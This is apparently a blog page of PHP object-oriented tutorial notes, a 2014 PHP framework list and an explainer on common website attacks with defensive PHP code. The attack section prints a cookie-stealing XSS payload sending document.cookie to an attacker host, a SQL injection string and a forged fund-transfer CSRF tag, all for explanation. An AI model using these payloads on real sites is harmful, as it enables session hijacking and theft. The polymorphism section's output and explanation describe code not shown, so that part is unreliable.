magento

OOPS (Object-Oriented Programming Concepts)

Class :

A class specifies the form of an object: it combines the data representation and the methods that manipulate that data into one neat package. The data and functions within a class are called members of the class.

Example ->

<?php
class Rahul {
    public $name;          // visible everywhere
    private $lastname;     // visible only inside Rahul
    protected $fullname;   // visible inside Rahul and its subclasses

    function Name() // method
    {
        echo "Rahul";
    }
}

$name = new Rahul();
$name->Name();

?>

Object :

An individual instance of the data structure defined by a class. You define a class once and then create many objects that belong to it. Objects are also known as instances.

Example 1 ->

<?php
class Example {
    public $name;
    public $item;

    function Sample() {
        $this->Test();   // one method calling another on the same object
    }

    function Test() {
        echo 'Test';
        echo $this->item;
        $regular = 500;
        echo $regular;
    }
}

$e = new Example();
$e->Sample();

?>

Example 2 ->

<?php
class A
{
    private $a;

    function set($a)
    {
        $this->a = $a;
    }

    function disp()
    {
        echo $this->a . "<br>";
    }
}

// Five separate objects of the same class, each holding its own value
$obj = array(new A(), new A(), new A(), new A(), new A());

$data = array(10, 20, 30, 40, 50);

for ($i = 0; $i < count($obj); $i++) {
    $obj[$i]->set($data[$i]);
}

foreach ($obj as $v) {
    $v->disp();
}

?>

Inheritance :

When a class is defined by inheriting the existing functions of a parent class, this is called inheritance. The child class inherits all or some of the member functions and variables of the parent class.

Example ->

<?php

class Foo
{
    public function printItem($string)
    {
        echo 'Foo: ' . $string . PHP_EOL;
    }

    public function printPHP()
    {
        echo 'PHP is great.' . PHP_EOL;
    }
}

// Bar inherits printPHP() unchanged and overrides printItem()
class Bar extends Foo
{
    public function printItem($string)
    {
        echo 'Bar: ' . $string . PHP_EOL;
    }
}

$foo = new Foo();
$bar = new Bar();
$foo->printItem('baz'); // Output: 'Foo: baz'
$foo->printPHP();       // Output: 'PHP is great.'
$bar->printItem('baz'); // Output: 'Bar: baz'
$bar->printPHP();       // Output: 'PHP is great.'

?>

Polymorphism :

This is an object-oriented concept where the same function can be used for different purposes.

Example ->

<?php

class lineitem {
    public $amount;
    public $what;

    // Modern constructor; the old PHP 4 style of naming the constructor after
    // the class is deprecated in PHP 7 and removed in PHP 8
    function __construct($amount, $desc) {
        $this->amount = $amount;
        $this->what = $desc;
    }

    function getname() {
        return $this->what;
    }

    function getval() {
        return $this->amount;
    }
}

// A bill is a line item whose amount is stored negated
class bill extends lineitem {
    function __construct($amount, $desc) {
        parent::__construct(-$amount, $desc);
    }
}

// Income inherits everything from lineitem unchanged
class income extends lineitem {
}

$acc[0] = new bill(15.40, "Break Rolls");
$acc[1] = new bill(17.75, "Carpet leaner");
$acc[2] = new income(37.84, "options added by Berks Folks");

$tot = 0;
$format = "%-35s ... %8.2f\n";

// The same getval()/getname() calls work on every item, whatever its class
foreach ($acc as $item) {
    $amount = $item->getval();
    $whom = $item->getname();
    printf($format, $whom, $amount);
    $tot += $amount;
}

printf($format, "TOTAL ...", $tot);

?>

OUTPUT:

DerivedClass method called

In the above example, the object $c of class DerivedClass is created and passed to the processClass() method. The parameter accepted by processClass() is of type BaseClass. Within processClass() the method myMethod() is called. Since the method is called on a variable typed as BaseClass, it would be natural to assume that myMethod() of BaseClass will run. But, as per the definition "when the decision to invoke a function call is made by inspecting the object at runtime, it is called polymorphism", myMethod() is called on the DerivedClass object. This happens because the object actually passed is a DerivedClass, so the myMethod() of DerivedClass runs.

The function name stays the same, but it can take a different number of arguments and do a different task.

Overloading :

Overloading is the ability of one function to perform different tasks, i.e. it allows creating several methods with the same name which differ from each other in the types of their inputs and outputs.
Overloading can be used with functions and members.

Example (C++-style signatures) ->

int volume(int s);
double volume(double r, int h);
long volume(long l, int b, int h);

Depending on the parameters passed, the corresponding function is called.
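PHP itself does not allow several methods with the same name, so the three-way volume() above has to be emulated. The following is an added example, not code from the original post: one magic __call() method receives the name and the arguments and dispatches on the argument count. The Volume class and its helper names are assumptions.

```php
<?php
// Added example: PHP cannot declare several volume() methods with different
// signatures, so __call() receives the name and arguments and dispatches by hand.
// The Volume class and its private helpers are assumed names for illustration.
class Volume
{
    private function cube(float $s): float          // volume(s)
    {
        return $s ** 3;
    }

    private function cylinder(float $r, float $h): float   // volume(r, h)
    {
        return M_PI * $r * $r * $h;
    }

    private function box(float $l, float $b, float $h): float   // volume(l, b, h)
    {
        return $l * $b * $h;
    }

    // Invoked for any call to a method that is not publicly defined, e.g. ->volume()
    public function __call(string $name, array $args): float
    {
        if ($name !== 'volume') {
            throw new BadMethodCallException("Unknown method $name()");
        }
        // Validate before dispatching: a non-numeric argument is rejected, not coerced
        foreach ($args as $a) {
            if (!is_numeric($a)) {
                throw new InvalidArgumentException('volume() accepts numbers only');
            }
        }
        switch (count($args)) {
            case 1:  return $this->cube(...$args);
            case 2:  return $this->cylinder(...$args);
            case 3:  return $this->box(...$args);
            default: throw new ArgumentCountError('volume() takes 1, 2 or 3 arguments');
        }
    }
}

$v = new Volume();
echo 'cube:     ', $v->volume(3), "\n";
echo 'cylinder: ', round($v->volume(2, 5), 2), "\n";
echo 'box:      ', $v->volume(2, 3, 4), "\n";
```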

Data Abstraction :

Any representation of data in which the implementation details are hidden (abstracted) is known as data abstraction.

Example ->

<?php

abstract class Cheese
{
    // can ONLY be inherited by another class
}

class Cheddar extends Cheese
{
}

$dinner = new Cheese;  // fatal error
$lunch = new Cheddar;  // works!

?>

Encapsulation :

Refers to the concept of bundling all the data and the member functions that operate on it together to form an object, so that the data can only be reached through those functions.
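An added example of encapsulation (not code from the original post): the balance is private, so the only way to change it is through methods that enforce the rules, and no caller can bypass the check. The Account class and its rules are assumptions.

```php
<?php
// Added example: hidden state plus a validating interface. The class and its
// rules are assumptions for illustration, not code from the original post.
class Account
{
    private float $balance = 0.0;   // not reachable as $acct->balance from outside

    public function deposit(float $amount): void
    {
        $this->guard($amount);
        $this->balance += $amount;
    }

    public function withdraw(float $amount): void
    {
        $this->guard($amount);
        if ($amount > $this->balance) {
            throw new RuntimeException('insufficient funds');
        }
        $this->balance -= $amount;
    }

    public function balance(): float
    {
        return $this->balance;   // read access only; there is no setter
    }

    // Every change goes through the same validation, so an invalid value
    // (negative, zero, NaN or infinite) can never reach the stored balance.
    private function guard(float $amount): void
    {
        if (!is_finite($amount) || $amount <= 0) {
            throw new InvalidArgumentException('amount must be a positive finite number');
        }
    }
}

$acct = new Account();
$acct->deposit(100);
$acct->withdraw(30);
echo 'balance: ', $acct->balance(), "\n";

try {
    $acct->withdraw(-500);   // would add money if the field were public and unchecked
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```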

 

PHP Frameworks

TOP TEN BEST PHP FRAMEWORKS FOR 2014

PHP is a very powerful and well known platform. Almost 50% of the web is powered by PHP. If you are a PHP developer then you should know that a framework makes things simple, manageable and fun to work with. There are many PHP frameworks out there, so it is probably hard to choose one. In this post I have compiled a list of the top ten PHP frameworks for 2014. Every framework listed here has its advantages and disadvantages. In this post I have briefly described each framework and its uses. Enjoy!

Laravel

Laravel is an amazing PHP framework for web artisans. Build huge enterprise applications, or simple JSON APIs, Write powerful controllers, or slim restful routes. Laravel is perfect for jobs of all sizes.

Phalcon

Phalcon is a web framework implemented as a C extension offering high performance and lower resource consumption.

Symfony

Symfony is a PHP framework for web projects. It speeds up the creation and maintenance of your PHP web applications. Replace the repetitive coding tasks by power, control and pleasure.

Code Igniter

CodeIgniter is a powerful PHP framework with a very small footprint, built for PHP coders who need a simple and elegant toolkit to create full-featured web applications. CodeIgniter is a proven, agile & open PHP web application framework powering the next generation of web apps.

Yii

Yii is a high-performance PHP framework best for developing Web 2.0 applications. Yii comes with rich features: MVC, DAO/ActiveRecord, I18N/L10N, caching, authentication and role-based access control, scaffolding, testing, etc. It can reduce your development time significantly.

Aura

If you like clean code, fully decoupled libraries, and truly independent packages, then the Aura project is for you. Download a single package and start using it in your project today, with no added dependencies. The primary goal of Aura is to provide high-quality, well-tested, standards-compliant, decoupled libraries that can be used in any codebase. This means you can use as much or as little of the project as you like.

Cake

CakePHP makes building web applications simpler and faster, and requires less code.

Zend

Zend Framework 2 is an open source framework for developing web applications and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and utilises most of the new features of PHP 5.3, namely namespaces, late static binding, lambda functions and closures.

Flight

Flight is a fast, simple, extensible framework for PHP. Flight enables you to quickly and easily build restful web applications.

Kohana

An elegant HMVC PHP5 framework that provides a rich set of components for building web applications.

Hacking function

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE

Pop quiz: what do Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?

They’ve all been recently hacked.

Yes, hacking is a growing threat for every business both large and small.

Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time.

Hackers can attack in so many ways, but here are the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection attacks occur when there are flaws in your SQL database, SQL libraries, or even the operating system itself. Employees unknowingly open seemingly credible files with hidden commands, or "injections".

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An injection attack could start from a query built like this:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

The hacker modifies the 'id' parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customer's.
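The same query in PHP, as an added example that is not from the original post: the concatenated form beside a PDO prepared statement. It builds a constructed two-row accounts table in an in-memory SQLite database, so it needs the pdo_sqlite extension.

```php
<?php
// Added example: constructed in-memory database so the script runs stand-alone.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (custID TEXT, owner TEXT)');
$db->exec("INSERT INTO accounts VALUES ('1001', 'alice'), ('1002', 'bob')");

// Vulnerable: the request value becomes part of the SQL text, exactly like the
// concatenated query above, so quotes in the value rewrite the WHERE clause.
function findVulnerable(PDO $db, string $id): array
{
    $sql = "SELECT * FROM accounts WHERE custID='" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the statement is compiled with a placeholder and the value is bound
// afterwards, so it is always treated as data and can never change the query.
function findSafe(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT * FROM accounts WHERE custID = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$id = "' or '1'='1";   // the modified id parameter described above

printf("concatenated query: %d row(s)\n", count(findVulnerable($db, $id)));
printf("prepared statement: %d row(s)\n", count(findSafe($db, $id)));
```

With the modified id the concatenated query returns both rows while the prepared statement returns none; a genuine custID such as 1001 returns exactly one row in both.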

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, URL "get request", or file packet is sent to the web browser window, bypassing the validation process. Once an XSS script is triggered, its deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.
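The same input element rendered in PHP, as an added example that is not from the original post: first with the raw parameter and then with output encoding for the HTML attribute context. The parameter value is constructed and the attacker host is a placeholder.

```php
<?php
// Added example: the 'CC' parameter is constructed here instead of read from
// $_GET so the script runs stand-alone; attacker.example is a placeholder host.
$cc = "'><script>document.location='http://attacker.example/?c='+document.cookie</script>'";

// Vulnerable: the raw value closes value='...' and the browser runs the script
function renderVulnerable(string $cc): string
{
    return "<input name='creditcard' type='TEXT' value='" . $cc . "'>";
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES turns both
// quote characters into entities, so the value can no longer leave the attribute.
function renderSafe(string $cc): string
{
    $enc = htmlspecialchars($cc, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input name='creditcard' type='TEXT' value='" . $enc . "'>";
}

echo renderVulnerable($cc), "\n\n";
echo renderSafe($cc), "\n";

// Encoding is context-specific: attribute values, element text, JavaScript
// strings and URLs each need their own encoder. For a value placed in a URL:
echo "<a href='/lookup?cc=" . htmlspecialchars(rawurlencode($cc), ENT_QUOTES) . "'>link</a>\n";
```

Marking the session cookie HttpOnly (see the session example further down) additionally keeps document.cookie from exposing the session ID even if an encoding is missed somewhere.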

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials stored unprotected (i.e. not hashed or encrypted)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.
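An added example (not from the original post) of session handling that gives a "no" to each question in the checklist: hashed credentials, cookie-only session IDs with strict mode, a fresh ID on login, an idle timeout and a real logout. The user store is constructed and the function names and the 15-minute limit are assumptions.

```php
<?php
// Added example; names and the 15-minute idle limit are assumptions. The
// constructed user store keeps only password hashes, never the passwords.
define('USERS', ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);
const IDLE_TIMEOUT = 900;   // seconds of inactivity before the session is dropped

// Cookie-only IDs (never in the URL), strict mode (IDs the server did not issue are
// refused, which defeats fixation), cookie flags: HTTPS only, hidden from document.cookie.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_strict_mode', '1');
session_set_cookie_params(['lifetime' => 0, 'path' => '/', 'secure' => true,
                           'httponly' => true, 'samesite' => 'Strict']);
session_start();

function login(string $user, string $password): bool
{
    if (!isset(USERS[$user]) || !password_verify($password, USERS[$user])) {
        return false;
    }
    session_regenerate_id(true);   // fresh ID after authentication, old one destroyed
    $_SESSION['user'] = $user;
    $_SESSION['last_seen'] = time();
    return true;
}

function currentUser(): ?string
{
    $expired = !empty($_SESSION['user']) && time() - $_SESSION['last_seen'] > IDLE_TIMEOUT;
    if ($expired) {
        logout();                  // idle too long: drop the session entirely
    }
    if (empty($_SESSION['user'])) {
        return null;
    }
    $_SESSION['last_seen'] = time();
    return $_SESSION['user'];
}

function logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 3600, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

$good = login('alice', 'correct horse battery staple');
$who = currentUser();
logout();
$after = currentUser();   // the session is gone, so no user is returned
var_dump($good, $who, $after);
```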

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another, "poisoning" everything in its path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that "points to" a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that accesses the endpoint thinks they are accessing the right file when they really are not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.
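An added example (not from the original post) of the check an application can make before writing an output file into a directory that others can write to. It refuses names that leave the directory and names already occupied by a symlink, and it demonstrates both with a constructed temp directory.

```php
<?php
// Added example (not from the original post): create a report file under a
// fixed directory while refusing names that traverse out of it or that an
// earlier planted symlink would redirect. All paths here are constructed.
function safeCreate(string $baseDir, string $name, string $data): bool
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return false;
    }
    // Only a plain file name: no separators, no "." or ".." components
    if ($name === '' || $name !== basename($name) || $name === '.' || $name === '..') {
        return false;
    }
    $target = $base . DIRECTORY_SEPARATOR . $name;
    // 'x' opens with O_CREAT|O_EXCL: it fails if anything, including a symlink
    // (even a dangling one), already exists at $target. That is what closes the
    // window between checking and opening; an is_link() check alone would be racy.
    $fh = @fopen($target, 'x');
    if ($fh === false) {
        return false;
    }
    // Belt and braces: the file just created must resolve directly inside $base
    $resolved = realpath($target);
    if ($resolved === false || dirname($resolved) !== $base) {
        fclose($fh);
        unlink($target);
        return false;
    }
    fwrite($fh, $data);
    fclose($fh);
    return true;
}

// Demonstration in a throw-away temp directory
$dir = sys_get_temp_dir() . '/symlink-demo-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/victim.txt', "original contents\n");
symlink($dir . '/victim.txt', $dir . '/report.txt');   // a link planted under the name the app uses

var_dump(safeCreate($dir, 'report.txt', "new data\n"));      // a symlink already occupies this name
var_dump(safeCreate($dir, '../report.txt', "new data\n"));   // traversal in the name
var_dump(safeCreate($dir, 'fresh.txt', "new data\n"));       // an unused plain name
echo file_get_contents($dir . '/victim.txt');                 // the file the link pointed at
```

Only the third call succeeds, and victim.txt keeps its original contents because the write through the planted link was refused.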

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

CROSS SITE REQUEST FORGERY EXAMPLE:

Here's an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.
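An added example (not from the original post) of the defence on the server side: the transfer endpoint accepts POST only and requires a per-session token that a forged image request cannot know. The handler and the sample requests are constructed.

```php
<?php
// Added example (not from the original post): the transfer endpoint guarded by
// a per-session token. A forged <img src> request is a GET with no token, so it
// is rejected twice over. The handler and its inputs are constructed here.
session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));   // 256 bits from the CSPRNG
    }
    return $_SESSION['csrf'];
}

// Emit this inside every state-changing form so legitimate POSTs carry the token
function csrfField(): string
{
    return '<input type="hidden" name="csrf" value="' . htmlspecialchars(csrfToken(), ENT_QUOTES) . '">';
}

function csrfValid(array $post): bool
{
    $sent = $post['csrf'] ?? '';
    // hash_equals compares in constant time so the check does not leak the token
    return is_string($sent) && isset($_SESSION['csrf']) && hash_equals($_SESSION['csrf'], $sent);
}

function handleTransfer(string $method, array $post): string
{
    if ($method !== 'POST') {            // state changes never happen on GET
        return '405 Method Not Allowed';
    }
    if (!csrfValid($post)) {             // token absent or wrong: not from our form
        return '403 Forbidden';
    }
    // ... the transfer for the logged-in user would be performed here ...
    return '200 OK: transfer of ' . (int)$post['amount'] . ' accepted';
}

// Constructed requests: the forged GET from the image tag, a POST without a
// token, and a POST submitted from a form that included csrfField()
$forged = ['amount' => '1500', 'destinationAccount' => 'attackersAcct'];
echo handleTransfer('GET', $forged), "\n";
echo handleTransfer('POST', $forged), "\n";
echo handleTransfer('POST', $forged + ['csrf' => csrfToken()]), "\n";
echo csrfField(), "\n";
```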

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Service, is where a server's or a machine's services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack is sending tons of URL requests to a website or a webpage in a very small amount of time. This causes a bottleneck on the server side because the server's CPU runs out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

Blog at WordPress.com.
